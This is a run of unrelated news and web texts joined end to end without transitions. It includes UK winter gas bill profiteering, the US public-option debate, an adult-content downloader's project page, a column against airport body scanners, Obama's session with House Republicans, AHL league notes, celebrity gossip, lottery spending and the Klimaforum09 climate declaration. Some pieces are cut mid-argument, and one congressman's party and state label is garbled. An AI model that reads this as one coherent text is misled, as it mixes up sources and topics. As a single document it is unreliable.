funny , commenter asgbhg56 spouting off about ed hardy merch seems to disagree .
note : starred commenters see unapproved comments , many of which are spam from chinese knock off sites .
i almost envy ponies ! for his recent destarring .
he does n't have to sift through all that garbage any more .
Families face shock 20 % rise in heating bills as gas giants cash in on Big Freeze
Gas bills will rise by 20 % as families battle to keep warm during the cold winter
Families face record winter gas bills averaging £ 360 as power companies reap a huge windfall from the big freeze .
The ' big six ' energy suppliers have refused to pass on a steep fall in wholesale prices to customers .
They are collecting a profit bonanza of £ 846 million in a single month by charging over the odds to keep homes warm .
Householders have had no choice but to turn up the heat to cope with the coldest spell in 30 years , with snow and ice blanketing the entire country .
Domestic demand for gas over the last month is predicted to be 60 per cent higher than in a normal winter .
This increased consumption will result in average bills of £ 360 for the three - month period from November through to the end of January , compared with £ 300 a year ago .
Greedy suppliers decided to reduce the tariff to customers by less than 10 per cent - even though the wholesale price of gas came down by some 60 per cent between 2008 and 2009 .
Separately , heating oil companies , which provide fuel to thousands of rural communities , have been accused of putting up their prices by more than 50 per cent since November .
The evidence of apparent profiteering has brought calls from consumer groups and MPs for inquiries by both the Competition Commission and the Office of Fair Trading .
At the same time , there is a mounting clamour for a windfall tax from pensioner groups , Labour MPs , unions , think tanks and the Local Government Association , which represents councils from all parties .
Analysts at the TheEnergyShop.com suggest the bill in the coldest period over Christmas and New Year would have been at least £ 36 lower if suppliers had cut their prices by a further 10 per cent , as they easily could , before the winter began .
Multiplying this across the nation 's 23.5 million households suggests the big six - British Gas , Scottish & Southern Energy ( SSE ) , RWE nPower , Eon , EDF and Scottish Power - are making an extra £ 846 million in a month .
British Gas is on course for a rise of more than 50 per cent in annual profits
SSE recently revealed a 36 per cent increase in profits for the period before the temperatures plummeted .
UK suppliers owned by German , French and Spanish firms are enjoying a similar bonanza .
The snow continues to cause disruption , as evidenced by this snow plough clearing thawing snow on the A66 in County Durham
Andrew Hallett , energy expert at the official customer body , Consumer Focus , said : ' As energy firms failed to fully pass on wholesale price cuts before winter they will be cashing in on the cold snap .
' Consumers are paying over the odds for their increased heating needs , giving a profits boost to suppliers . '
Joe Malinowski , founder of TheEnergyShop.com , said : ' This year 's record winter bills will come as a real shock to many people particularly when you consider that wholesale gas prices fell by over 30 per cent in 2009 and are 60 per cent lower than their 2008 peak .
' In freezing conditions , turning down the heating is not always an option . '
Apart from the cost , there is a real threat to the health of elderly customers who are too scared to turn on their heating .
It is feared the cold temperatures , which exacerbate many underlying health problems , could contribute to some 60,000 deaths .
The National Pensioners ' Convention said : ' We know that energy firms are quick to put up prices yet very slow to bring in the reductions .
' Energy companies , particularly in this cold winter , will be making huge profits out of very vulnerable customers .
That raises the serious question as to whether they should pay money back through a windfall tax to fund things like home insulation . '
The Local Government Association has argued the need to raise an extra £ 500 million a year for ten years from both oil and gas firms to fund a massive home insulation scheme .
Christine McGourty , director of Energy UK , which represents the major gas and electricity suppliers , rejected allegations of profiteering and advised anyone struggling with bills to contact the supplier for help .
She said much of the gas being used this winter was bought up to two years ago , when wholesale prices were higher .
After a weekend of furious activity , Democratic leaders in the Senate think they are close to getting the votes they need in order to pass an " opt- out " version of the public option .
But they feel like President Obama could be doing more to help them , with one senior staffer telling TNR on Sunday that the leadership would like , but has yet to receive , a clear " signal " of support for their effort .
The White House , for its part , says President Obama supports a strong public option , as he always has -- and that , as one senior administration official puts it , the president will support the Senate leadership in " whichever way " it chooses to go on this particular question .
Read those statements carefully and you 'll see they do n't actually contradict each other .
Instead , they offer a pretty good picture of where the public option debate is at the beginning of a week that could quite possibly decide its fate .
For those just tuning in , the underlying issue here is whether to create a government - run insurance program into which people could enroll voluntarily and that might , ideally , provide more affordable coverage while providing the private insurance industry with much - needed competition .
As recently as two or three weeks ago , many observers ( this writer included ) thought the idea was more or less dead politically .
About
Gnaughty is a program to automatically download adult sex content , i.e. porn movies and pictures , from a known internet porn directory .
Providing a friendly interface , users who feel like having some porn can have it served fastly and directly to their desktop .
Features
No spyware , no adware
Free software , provided under the GPL license
Wide variaty of porn categories
Fast parallel downloads ( you can configure number of concurrent downloads )
Automatically organize content in subfolders
Launch downloaded content right from gnaughty
Proxy support
Many more ...
Download
Contact
The project has recovered from a stalling period , no big features are planned , but any kind of feedback , suggestion or contribution is more than welcome , for example to better integrate Gnaughty into GNOME .
You can contact me at the email address .
Last updated : 2010-01-04
You did n't get a virgin when you drew me as one of your political commentators , for I 've been through the fires of Texas politics , including having been elected state agriculture commissioner .
Among other duties , this office made me the regulator of such matters as pesticide use , the accuracy of gas pump gauges and even the sizing of eggs .
I can tell you from experience that wielding regulatory authority is both a blessing and a curse for political officials .
You can do some real good for the public , but your best efforts can also make fast enemies of the regulatees .
So my general instruction to the staff was that we should not regulate just for the hell of it , just because we could .
Rather , any rules we imposed should respond to a real need and should actually work — work in the sense that they would deliver the protection the public needs .
We had a little internal slogan to guide us : " When in doubt , try common sense . "
I 'd like to loan this slogan to the national authorities in charge of protecting us from terrorist attacks , for they seem determined to restrict the American people rather than actually to stop terrorists .
In response to the deranged Nigerian who tried to blow up a passenger jet with his underwear on Christmas Day , they 've done a collective regulatory knee - jerk that is kicking us ever deeper into the wilds of security silliness .
This was not their first knee - jerk .
Thanks to the fizzled shoe bomb incident aboard a 2001 flight , they still require all of us who fly in our Land of the Free to bow to the gods of global terrorism before entering the terminal by removing our booties and putting our tiny tubes of toothpaste in little zippy bags .
This ridiculous ritual , we 're told , will fend off another shoe bomber .
But terrorists seem to be somewhat adaptive ( gosh , who could 've imagined it ? ) , so the latest attack comes not from shoes , but from an al - Qaida guy 's shorts .
The only way to stop this , cry the knee - jerkers , is to have authorities peek under every passenger 's skivvies .
To allow airport screeners to do just that , corporate profiteers are peddling super - sophisticated x-ray machines with " superman eyes . "
You will have to stand in the scanner , and spread your legs and raise your arms in the arrest position to give your friendly screener a front - and - back , full - body look right through your clothes .
Supposedly , faces will be blurred out , but body contours of every man , woman and child who flies will be on the screen — and some images almost certainly will pop up on Internet postings .
" So what ? " bark the authorities .
Freedom comes at a price , and this new rule is all about us protecting you .
Really ?
Let 's note that one of the big backers of the full - body technology is former homeland security honcho Michael Chertoff .
In dozens of interviews he gave after the Christmas incident , Chertoff demanded nationwide deployment of these machines to stop more underwear attacks by terrorists .
Now , guess whose Washington consulting firm represents Rapiscan Systems , one of the major contractors selling the machines to the government .
Right .
Chertoff 's firm .
Rather than searching every one of us , officials need to be searching for actual terrorists , using old - fashioned intelligence - gathering and common - sense coordination to stop assailants before they even get to an airport .
The Christmas Day bomber should never have gotten near that plane , for he was known by U.S. officials to be a terrorist threat .
How did they know ?
His own father told our officials about him last November !
Yet , in a gross failure of inter-agency communications , no official revoked his visa or put him on the " no fly " list .
Our authorities want us to pay ( in cash and liberties ) for a whiz - bang technological gimmick that will enrich a couple of corporations , but will do nothing to stop the next thing the terrorists come up with .
Let 's raise common sense to high places .
One group fighting this latest technological silliness can be reached at flyersrights.org .
To find out more about Jim Hightower , and read features by other Creators Syndicate writers and cartoonists , visit the Creators Syndicate web page at www.creators.com.
It was n't exactly sweetness and light when President Obama visited with House Republicans today in an extraordinary Q - and - A session that exposed their stark political differences .
Obama told Republicans he welcomed disagreement and debate , but also knocked them for opposing the stimulus bill on " disappointing " party - line votes and making what he called false claims about health care .
" You 've given yourselves very little room to work in a bipartisan fashion because what you 've been telling your constituents is , ' This guy 's doing all kinds of crazy stuff that 's going to destroy America , ' " Obama told House GOP members gathered at a retreat in Baltimore .
Obama also protested some of the Republican objections to his health care initiative .
" If you were to listen to the debate -- and , frankly , how some of you went after this bill -- you'd think that this thing was some Bolshevik plot , " Obama said .
Rep. Jason Chaffetz , R - Utah , challenged Obama by saying he had backtracked on hiring lobbyists and holding health care talks on television .
" I can look you in the eye and tell you , we have not been obstructionist , " Chaffetz also said .
" The Democrats have the House and Senate and the presidency . "
And Rep. Tom Price , G - Pa. , pointedly asked the president : " What should we tell our constituents who know that Republicans have offered positive solutions to the challenges that Americans face and yet continue to hear out of the administration that we 've offered nothing ? "
Obama said no administration has been tougher on lobbying reform than his , but he said he agreed that the health care talks have not been handled well .
" I think it 's legitimate criticism , " Obama said .
" So on that one , I take responsibility . "
The two sides also clashed over tax cuts and budget deficits .
It is very rare for presidents to take questions from lawmakers of the opposite party , especially with television cameras rolling .
Rep. Jeb Hensarling , R - Texas , read a long question to Obama that included the statement , " Your administration proposed a budget that would triple the national debt over the next 10 years -- surely you do n't believe 10 years from now we will still be mired in this recession . "
Obama eventually cut off Hensarling , saying : " I know there 's a question in there somewhere , because you 're making a whole bunch of assertions , half of which I disagree with ... at some point , I know you 're going to let me answer . "
( Obama also referred to Jeb Hensarling , three times , as " Jim . " )
Rep. Mike Pence , R - Ind. , asked Obama twice whether he would support across - the - board tax cuts for all Americans , " as President Kennedy did . "
Obama said , " I 'm going to take a look at what you guys propose " and " check your math " in terms of balancing the budget .
For his part , Obama urged Republican support on newer parts of his economic policy , including fees for banks that received federal help and tax credits for employers who hire more workers .
During his discussion of the stimulus , Obama noted that the bill now priced at $ 862 billion included tax cuts as well as needed infrastructure construction .
" Some of you have been at the ribbon - cuttings for some of these important projects in your communities , " Obama said , needling his audience .
He also said both parties need to shun the kinds of point - scoring and election - year posturing that have turned off their constituents .
Americans " do n't want us to focus on our job security , " Obama said .
" They want us to focus on their job security . "
At another point , Obama told seemingly skeptical Republicans that " I am not an ideologue -- I 'm not . "
The House Republicans , meanwhile , gave Obama a book listing their policy proposals .
Will the appearance cool partisan passions in Washington ?
Well , Obama opened his statement with a variation of a movie line : " Keep your friends close , but visit the Republican caucus every few months . "
The original line , from The Godfather , Part II : " Keep your friends close -- but your enemies closer . "
( Posted by David Jackson )
On the second day of the All - Star event the President and CEO of the AHL David Andrews stands in front of the media to talk about the league and answer questions everyone has .
It was a smaller group of the media this year than last year .
That was one of the first things Andrews commented on was the lack of beat writers and a sign of the times with print media .
Edit :
Thanks for checking out the site , this was a rough draft of everything covered .
If you would like to listen to the entire state of the league address you can download it here :
Listen Part 1 : MP3 // Listen Part 2 : MP3
I ’ll run down just about every topic covered , starting with a few things that could directly impact Amerks fans .
— There are no plans right now to move Rochester to the East .
That could obviously change if a new team comes into the league and depending where they are but as of right now the layout of teams next year will be the same as this year .
— There will not be a reduction in the number of games played .
This was a big topic of discussion last year and about three quarters of the teams were for reducing the schedule but they could not reach the number needed .
Andrews said it was a very tiring project and when it did not work out it was time for a break .
When it comes down to it the teams that do fill their buildings every night did not want to lose the revenue .
— Salary cap ..
There is discussion and the AHL is the only league in pro hockey without a cap but it ’s unlikely it will happen .
The collective bargaining agreement expires in September and the possibility of a salary cap will be talked about but again unlikely .
The views on some form of cost control are similar to that in schedule reduction , some teams in favor , some teams oppose , and there is not a lot of agreement .
The whole point would be for some form of protection to control cost and level the playing field of teams .
Hershey has been successful with signing players and no one wants to knock success and they have the resources to stay competitive .
The one tricky part is that they could have a cap but what does it do to affiliation fee’s ?
NHL teams will say thanks for paying the the players less but the fee ’s stay the team .
If anything does happen the concern about driving players away is not that big of a concern as it might drive 4 or 5 guys but if it levels the playing field their ’s some value in it .
They ’re not going after the 95 % of the players earning a living .
— Some discussion about adding an official , hasnt been a lot of pressure for that .
No push for it by the NHL .
The NHL wants better supervision and coaching for the officials .
When they ’ve looked at the difference in penalties called with one versus two officials it was generally the same .
The other issue is with buildings have the space needed for it and the league as well .
— The AHL as a business is doing well .
There is a 4 - 5 % decline in ticket revenue right now , which is about the same as last year at this time and but the end of the year they were only down about .5 % at the end of the season .
— With attendance about 1/3 of the teams are doing better , 1/3 are the same as last year , and about 8 or 9 teams are having difficult years .
The attendance issues can sometimes be related to performance , sometimes economy .
It has certainly hit different areas differently .
— A lot more injuries than we ’re used to at the NHL level and the player callups are about 30 % ahead of last year with players recalled to the NHL .
— Interesting to note that the Washington Capitals had planned to call up John Carlson but when they found out he would have missed this All - Star event they decided against it .
— No site yet determined for 2011 All - Star Classic .
They ’ve done a lot of planning but no site finalized .
Two or three sites in discussions and it will probably be held around January 30th date .
Andrews said there was no bidding process , Andrews has a plan and is negotiating .. are having discussions with Hershey and others .
— For the 2011 event the league will replicate the 1942 game and play East / West format with throw back uniforms .
— Simple answer about Lowell is that the NJ Devils base their affiliate on player development .
They are in negotiations with Lowell and it ’s their first choice .
— Carolina wants an affiliate closer to them , league would n’t be opposed to have a team down there .
A number of things can happen and the news of Carolina wanting something down there does n’t say anything about Albany .
— Five or six expiring affiliation agreements at the end of this season .
We should expect a couple announcements in a few weeks of teams extending affiliations .
Dave Andrews is the only one who knows the teams .
— Edmonton has given every indication they do plan to go to Oklahome City but they have not pulled the trigger yet .
They dont want to cut ties with Springfield so they ’re making sure everything is going to happen , it ’s a great working relationship .
On a scale of 1 - 10 they are at about an 8 that they will activate in OKC .
— Iowa is on the market and for sale .
Some have shown interest in buying and moving it and some with keeping it in Iowa .
They ’d need an affiliate and Anaheim is the only team without an affiliate .
— Texas has a temporary franchise and spring meeting is the time it ’ll get resolved about what they ’re doing next season .
It is expected to happen that they ’ll find a franchise .
The exception wo n’t be extended if they ca n’t buy a franchise .
Andrews said never say never but he doubt ’s the league would .
Iowa was complicated at the time and a sale was n’t easy , is easier now .
— No problems with logistics with Abbotsford , no teams have complained about having to go up there .
Confident they ’ll continue to grow .
— Group sales are more than 30 % of business around the AHL .
— Adirondack is doing really well , a success story .
— The move to Abbotsford was not a strategic move by the league , was a move by the Flames to put a team out there .
Not the doorway to moving to the West .
— Abbotsford gets to play more teams with more teams playing them .
— West coast potential is there , a West coast solution is not imminent though .
Some
West teams think being East is better for player development so the players are not traveling as much .
Andrews said that he has no idea where West coast teams would get franchises though .
— Chris chelios is an incredible athlete , one of the best players on the ice when they saw him .
They ’re happy to have him in the league .
— No plans to have an outdoor game as a feature event .
In Syracuse its a Syracuse event , not an AHL event .
I think it ’s a given the game will be on national TV but a contract has not been signed .
— Made it very clear to players that if you target players from behind or a hit to the head you ’ll be suspended and lose salary .
— A player wishing to use the Messier helmet would be allowed to if the player and doctor came ot the league .
It ’s not an unsafe helmet .
Concussions are almost always because helmet is not worn properly .
No real evidence showing that the Messier helmet is any more safe than the RBK helmet .
Most concussions are caused by hits to the face , not to the head and the helmet . –
Agreement between NHL and Canadian MJH that prevents players to be sent back .
Its a big business in Canada .
Selfishly I ’d say yes we want those players in our league but there ’s no talk about changing that .
— Andrews said that there has been a slippage in hooking and holding penalties being called in both leagues .
If it slips any more the more it slows down the game and they ’ll really need to address the issue again .
— No talk about replay , it ’s really a cost issue .
The board of governors is convinced that if you do n’t have what the NHL has the replay system is not trustworthy enough and it can cause more controversy without the proper equipment .
— When asked about HD equipment for broadcasts he said that there has been no talk but there should be .
They would love to have better camera angles .
The quality has improved in recent years and again it ’s a cost issue .
Mon , 11 January 2010
Keanu Reeves Smokes Up For ' Henry 's Crime '
A clean - shaven Keanu Reeves gulps down a healthy smoothie during a cigarette break on the set of his latest movie , Henry 's Crime , in Tarrytown , New York on Monday ( January 11 ) .
The 45 - year - old actor is not only starring in the Malcolm Venville - directed romantic comedy , he 's also producing !
Keanu plays a bighearted man who is falsely accused of robbing a bank in Buffalo .
This is Keanu 's first comedy since 2003's Something 's Gotta Give ( he played a doctor ) .
Also starring : James Caan and Vera Farmiga ( Up In The Air ) .
Read more : http://justjared.buzznet.com/page/3/#ixzz0cOQFRpan
( CNN ) -- Jen Bucala has a lot of faith in her family 's " lucky " numbers .
" I 've been playing , or around playing , the lotto all my life , " she says .
She rattles off her numbers , citing family birthdays , and recounting numerical coincidences .
" Me , my husband , my father - in - law ... all our birthdays are in November .
Just a week apart from each other , " says Bucala , 31 .
One number that did surprise her was $ 10,000 .
After some quick figuring , Bucala estimates she has spent that amount on scratch off games and Megamillions since she started playing a decade ago .
For Bucala , a Lindenhurst , New York , resident who works three jobs -- as a sales associate , an Avon Rep and a bridal consultant -- that is a lot of money .
" That ten grand could have gone toward a million and one bills I have -- my mortgage , car payments , " Bucala says .
" We spend thousands of dollars every month on bills .
I do n't have kids either .
That [ lotto ] money could have been a whole month for me for bills , " she says .
But like a lot of people , Bucala thinks $ 1 is a small price to pay for a dream .
" You gotta play in order to win .
That 's part of lotto .
You never know , " says Bucala .
One of the seductive features of the lotto is the low entry fee says Frank Farley , a psychology professor at Temple University .
" It can be exciting , checking those winning numbers , " says Farley .
" Maybe something big might happen .
There 's not a whole lot of other things in your life where you put a small amount of money in and maybe something big will happen .
It gives you a sliver of hope that you could turn your life around . "
And sometimes there are winners .
Mineola Oaks , is retired and living in Washington Heights , New York .
She has played lotto every day , spending $ 3 - $ 5 a day ( and more on Tuesday ) for over 20 years .
( Just $ 4 a day for 20 years adds up to almost $ 30,000 . )
Two years ago she won $ 100,000 .
And with that money she paid off her bills and did some remodeling on her second home in Virginia .
Oaks still buys lotto tickets , but she cautions that there 's always something else you can put the money towards .
" I take care of things first , " she says .
" Food , rent -- Then you can go out and spend a dollar on the lotto . "
Just do n't expect to win .
Let 's take Powerball for example .
Your chances of winning the jackpot is one in 195,249,054 says Michael Orkin , a statistician and dean of business , math and science at Laney College in Oakland , California .
Let 's say you buy 50 Powerball tickets a week , you 'll win the jackpot about once every 75,000 years , he says .
Cold , hard numbers aside , the lotto is entertainment .
" Almost everyone spends money on entertainment , " says Stephen Brobeck of the Consumer Federation of America .
" People spend hundreds of dollars going to a sports event .
Others spend a thousand dollars a year on premium cable channels .
Purchasing a lotto ticket -- it 's excitement and there 's always the possibility , however slim , that they will strike it rich and win , " he says .
Cost of fleeting excitement adds up
Sodanys Paulino , 21 , of Washington Heights , stood outside a lottery terminal one rainy Friday night .
She bought two scratch off tickets and a mega millions ticket .
When asked what else she could be doing with that money , she laughs .
" Two dollars ?
You can't buy anything for two dollars , " she says .
But $ 2 a week is about $ 100 a year .
And $ 100 can buy you something .
The problem is opportunity costs , says Farley .
" What opportunities are lost because you are putting discretionary income into the lottery when you could be putting it into something else ? " he asks .
" A small amount of money can be spent on dental floss , " he says .
The lotto sends the wrong message , says Farley .
" It 's hard work versus chance .
The lotto says success can be built on chance . "
A 2005 study by the Consumer Federation of America says 38 percent of people with incomes below $ 25,000 think that winning the lottery represents the most practical way for them to accumulate several hundred thousand dollars .
" Lower income people think their chances of winning are slim .
And they think that the probability [ for them to win ] is greater than being able to accumulate savings over time .
The lotto advantage
Peter Tufano , a Professor at Harvard Business School , harnessed this idea that people would rather have a small probability of a large payout when he came up with the " Save to Win " idea .
It 's part savings , part raffle ticket .
And it's had major success in Detroit , Michigan , where eight credit unions have been offering it since January .
Here 's how it works .
You open up a one - year certificate of deposit and for every $ 25 you save , you get the chance to win a $ 100,000 prize .
Hank Hubbard , the director of Communicating Arts Credit Union in Detroit , Michigan , says when his credit union offered a 10 percent interest rate on a one - year CD , no one signed on , but with Save to Win , 14 percent of their membership signed up .
" I am surprised at the extent of the success .
We really are showing people that they can afford to save , " he says .
And in the very worst case even though someone may not win the grand prize , at least they 've already accumulated some savings .
But when it comes to playing the real thing -- old habits die hard .
" I 'm still going to buy my scratchoffs , " says Bucala .
" I 'm not going to go cold turkey , " she says .
" No way !
It 's too exciting ... knowing you have the chance to win . "
December 8 , 2009 -- Democracy Now ! --
Nigerian environmentalist Nnimmo Bassey : `` The global North owes a climate debt to Africa . ''
Click HERE for transcript .
A people 's declaration from Klimaforum09 , Copenhagen , December 10 , 2009
Summary
There are solutions to the climate crisis .
What people and the planet need is a just and sustainable transition of our societies to a form that will ensure the rights of life and dignity of all peoples and deliver a more fertile planet and more fulfilling lives to future generations .
We , participating peoples , communities and all organisations at the Klimaforum09 in Copenhagen , call upon every person , organisation , government and institutions , including the United Nations ( UN ) , to contribute to this necessary transition .
It will be a challenging task .
The crisis of today has economic , social , environmental , geopolitical and ideological aspects interacting with and enforcing each other as well as the climate crisis .
For this reason , we call for urgent climate action :
A complete abandoning of fossil fuels within the next 30 years , which must include specific milestones for every five - year period .
We demand an immediate cut in GHG of industrialised countries of at least 40 % compared to 1990 levels by 2020 .
Recognition , payment and compensation of climate debt for the overconsumption of atmospheric space and adverse effects of climate change on all affected groups and people .
Rejection of purely market - oriented and technology - centred false and dangerous solutions such as nuclear energy , agro-fuels , carbon capture and storage , Clean Development Mechanisms , biochar , genetically " climate - readied " crops , geo-engineering and reducing emissions from deforestation and forest degradation ( REDD ) , which deepens social and environmental conflicts .
Real solutions to climate crisis based on safe , clean , renewable and sustainable use of natural resources , as well as transitions to food , energy , land and water sovereignty .
Therefore , we demand COP15 reach an agreement that will initiate the restoration of the environmental , social and economic balance of planet Earth by means that are environmentally , socially and economically sustainable and equitable , and finally come up with a legally binding treaty .
The adverse impacts of human - induced climate change cause gross violations of human rights .
The nations have an obligation to cooperate internationally to ensure respect for human rights everywhere in the world according to the Charter of the United Nations .
Any specific agreement on climate change must be seen in the broader context of achieving a sustainable transition of our societies .
We , participating people and organisations at Klimaforum09 , commit to continue our full and active engagement in promoting such a transition , which will require a fundamental change in social , political and economic structures and a rectification of gender , class , race , generation , ethnic inequalities and injustices .
This requires restoration of democratic sovereignty of our local communities as a basic social , political and economic unit .
Local and democratic ownership and control over and access to natural resources will be the basis for meaningful and sustainable development of communities , and simultaneously reduce greenhouse gas emissions .
There is also the need for stronger regional and international cooperative arrangements to manage common and shared resources , and a stronger and democratic UN .
We call upon every concerned person , social movement , cultural , political or economic organisation to join us in building a strong global movement of movements , which can bring forward peoples ' visions and demands on every level of society .
Together , we can make global transitions to sustainable futures .
Sign the Klimaforum09 Declaration here :
http://spreadsheets.google.com/viewform?hl=da&formkey=dHdJS0dWM2ZoUE1zM0xVM3BRXzlQU0E6MA
System change -- not climate change ( full text )
A people 's declaration from Klimaforum09 , December 10 , 2009
1. Preamble
There are solutions to the climate crisis .
What people and the planet need is a just and sustainable transition of our societies to a form that will ensure the rights of life and dignity of all people and deliver a more fertile planet and more fulfilling lives to present and future generations .
A transition based on democratic principles of solidarity , especially for the most vulnerable , non-discrimination , gender equality , equity and sustainability , acknowledging that we are part of nature , which we love and respect .
To address the climate crisis , however , awareness creation and determined actions adhering to a rights - based framework are required .
The nations have an obligation to cooperate internationally to ensure respect for human rights everywhere in the world according to the Charter of the United Nations .
We , participating peoples , communities and all organisations at the Klimaforum09 in Copenhagen , call upon every person , organisation , government and institution , including the United Nations ( UN ) , to contribute to this necessary transition .
It will be a challenging task .
The crisis of today has economic , social , environmental , geopolitical and ideological aspects interacting with and enforcing each other as well as the climate crisis .
This very moment of conjunction of crises -- climate , energy , financial , food and water crises , among others -- urges us to unite and transform the dominant social and economic system as well as global governance , which blocks necessary solutions to the climate crisis .
For this reason , a movement from below is called upon to act now .
Environmental and climate debts must be paid .
No false , dangerous and short - term solutions should be promoted and adopted , such as nuclear power , agro- fuels , offsetting , carbon capture and storage ( CCS ) , biochar , geo- engineering and carbon trading .
Instead we should implement a truly sustainable transition built on clean , safe and renewable resources and energy conservation .
We welcome alliances across social movements and sectors , representing all ages , genders , ethnicities , faiths , communities and nationalities .
We want to take the future into our own hands by building a strong and popular movement of youth , women , men , workers , peasants , fisher folks , indigenous peoples , people of colour , urban , and rural social groups which is able to act on all levels of society to deal with environmental degradation and climate change .
We call for a new international economic order and support a strong and democratic UN as opposed to G8 , G20 or other closed groups of powerful countries .
2 . The challenge , as we see it
The concentration of greenhouse gasses ( GHGs ) in the atmosphere is already so high , that the climate system has been brought out of balance .
The CO2 concentration and global temperatures have increased more rapidly in the last 50 years and will rise even faster in the coming decades .
This adds to a multitude of other serious ecological imbalances , the impacts of which threatens the lives and livelihoods of the people of the world , most acutely , the impoverished people and other vulnerable groups .
The imbalance of the climate system leads to greater and more frequent extremes of heat and rainfall patterns , tropical cyclones , hurricanes and typhoons , extreme flooding and droughts , loss of biodiversity , landslides , rising sea levels , shortage of drinking water , shorter growing seasons , lower yields , lost or deteriorated agricultural land , decreased agricultural production , losses of livestock , extinction of ecosystems , diminished fish stocks , among others .
These phenomena are resulting in food crisis , famine , illness , death , displacement and the extinction of sustainable ways of life .
Interacting with this is the introduction of genetically modified organisms ( GMOs ) , monoculture farming and industrialised agriculture strongly promoted by corporations that seriously threaten the stability and diversity of ecosystems .
This also marginalises and impoverishes small - scale farmers and undermines food sovereignty .
Corporate - controlled agriculture is geared to meet global demand for overconsumption especially in the global North rather than for local basic needs .
The same can be said about modern industrial fisheries , intensive forestry and mining which destroys ecosystems , diminishes biodiversity and destroys the life and livelihoods of local communities .
These effects of climate change together with growing social inequalities and severe impacts on our common environment are already devastating the lives of millions of people as well as their local communities .
However , we -- the people -- are not prepared to accept this fact as our fate .
That is why there are fast - growing popular movements determined to defend their livelihoods and stand up against those forces and causes , which have led us on to this ultimately suicidal route of environmental destruction .
In Asia , Africa , Middle East , Oceania and South and Central America , as well as the periphery of North America and Europe , popular movements are rising to confront the exploitation of their land by foreign interests and to regain control over their own resources .
A new type of activism has revitalised the environmental movements , leading to a wide variety of protests and actions against mining , big dams , deforestation , coal - fired plants , air travel and the building of new roads among others .
There is a growing awareness about the need to change the present economic paradigm in a very fundamental way .
Among various movements , alternative ways of life are proliferating .
At the same time it is becoming evident to the public that the present holders of power are unwilling to face and deal with the threats of climate change and environmental degradation .
The so - called strategy of ``green growth '' or ``sustainable growth '' has turned out to be an excuse for pursuing the same basic model of economic development , that is one of the root causes of environmental destruction and the climate crisis .
3 . The causes , as we see them
The immediate and primary cause of human - induced climate change is an unprecedented emission of greenhouse gasses ( GHGs ) into the atmosphere originating from the increasing burning of fossil fuels from industry , commerce , transport and military purposes , to mention a few but significant sources .
Other important drivers of climate change are deforestation , extractive industries , forest degradation -- excluding Indigenous people 's sustainable practice of shifting cultivations -- disturbance of water cycle , expanding areas through land grabbing for industrial agriculture , increased industrial meat - production and other types of unsustainable use of natural resources .
Uneven control and ownership over resources
These immediate causes are the results of an unsustainable global economic system built on unequal access to and control over the planet 's limited resources and the benefits that accrue from their use .
This system is premised on the appropriation of local , national and planetary commons by local and global elites .
What has been praised as great strides in technology , production and human progress has in fact precipitated global ecological and development disasters .
Still , a privileged global elite engages in reckless profit - driven production and grossly excessive consumption while a very large proportion of humanity is mired in poverty with merely survival and subsistence consumption , or even less .
This is the situation not only in countries of the global South but also in the global North .
The world 's largest transnational corporations ( TNCs ) based mainly in the Northern countries and tax havens , but with expanding operations , have long been at the forefront of these excesses .
The competition among global corporations and rich nations for resources and greater market shares , as well as trade agreements and treaties , have led to a neo -colonial suppression of Southern peoples , denying them rightful ownership and control of their resources .
The World Trade Organization ( WTO ) and international financial institutions , as well as the European Union ( EU ) and United States ( US ) using bilateral trade agreements , are increasing the privatisation and commoditisation of public resources , intensifying the plunder of natural resources of underdeveloped countries and imposing conditions that increase their dependence .
Prevailing patterns of thought and alternatives
The development model promoted by these institutions is not only a question of ``economics ' ' .
The prevailing economic paradigm is strongly related to the system of thought , which is based on an imagination of the human being as ``economic man ' ' .
This ideology is reinforced by corporate media and marketing firms which promote egoism , competition , material consumption and boundless accumulation of private wealth in utter disregard of the social and ecological consequences of such behaviour .
This system of thought is intimately intertwined with patterns of patriarchy and paternalism .
If we really want to address this crisis , we need to recognise that the human species is part of both nature and society and cannot exist without either .
Therefore if humanity is to survive , we need to respect the integrity of Mother Earth and strive for harmony with nature and for peace within and between cultures .
We are at once citizens of different nations and of one world .
Everyone shares responsibility for the present and future well - being of the human family and the larger living world .
The spirit of human solidarity and kinship with all life is strengthened when we live according to the principle of ``One among many ' ' .
4 . A just and sustainable transition
It is clear that solving the climate crisis requires far - reaching transformations , which are currently excluded from the agenda of policy makers in governments and multilateral institutions .
People are calling for system change , not " business - as- usual " and the uncritical use of technology and market fixes along which powerful interests have set and confined the climate agenda .
Peoples ' movements are not lacking alternative visions for society and concrete steps that must be taken in order to move towards a sustainable future while addressing the climate , water , food and economic crises at the same time .
Such a sustainable transition will begin by many different initiatives .
Some of these steps towards sustainable transition are :
Food sovereignty and ecological agriculture :
Uphold the rights of people , communities , and countries to determine their own systems of production including farming , fishing , food , forestry and land policies , which are ecologically , socially , economically and culturally appropriate to the circumstances .
Peoples ' , especially women´s access to and control over productive resources such as land , seeds and water must be respected and guaranteed .
Agricultural production must rely principally on local knowledge , appropriate technology and ecologically sustainable techniques that bind CO2 in the diverse and native plant systems , bind water and return more nutrients to the soil , than was taken out .
Food and agricultural production must be primarily geared towards meeting local needs , encourage self - sufficiency , promote local employment , and minimise resource use , waste and GHG emissions in the process .
Democratic ownership and control of economy :
The reorganisation of society 's productive units around more democratic forms of ownership and management , in order to meet people 's basic needs such as employment creation , access to water , housing , land , health care and education , food sovereignty and ecological sustainability .
Public policy must make sure that the financial system serves public interests and channel resources for the sustainable transformation of industry , agriculture and services .
Energy sovereignty : A dramatic reduction of energy consumption especially in the unjustly enriched countries combined with a blend of renewable and public energy sources such as solar , wind , geothermal , mini - hydro , wave and the development of off - the - grid electricity distribution to secure energy supplies to communities , and public ownership for the grid .
Ecological planning of urban and rural zones :
The aim is a radical reduction in the inputs of energy and resources and the outputs of waste and pollution while encouraging locally based supply of basic needs of the citizens .
An urban and rural planning built on social justice and equal service to all reducing the need for transport .
Promoting public transport systems such as light and high - speed rail systems and bicycles reducing the need for private motor vehicles thus decongesting the roads , improving health and reducing energy consumption .
Education , science and cultural institutions : Re-orientate public research and education to meet the needs of people and the environment , rather than the present bias for developing commercially profitable and proprietary technologies .
Research and development should be primarily an open and collaborative endeavour in the common interest of humankind , and eliminate patents on ideas and technology .
Fair and just exchange of appropriate technologies , traditional knowledge and indigenous innovative practices , and ideas between countries should be encouraged .
End to militarism and wars :
The present fossil fuel - based development model leads to violence , war and military conflict over control of energy , land , water and other natural resources .
This is demonstrated by the US - led invasion and occupation of Iraq and Afghanistan , militarisation in across in the globe in regions rich on fossil fuels and other natural resources .
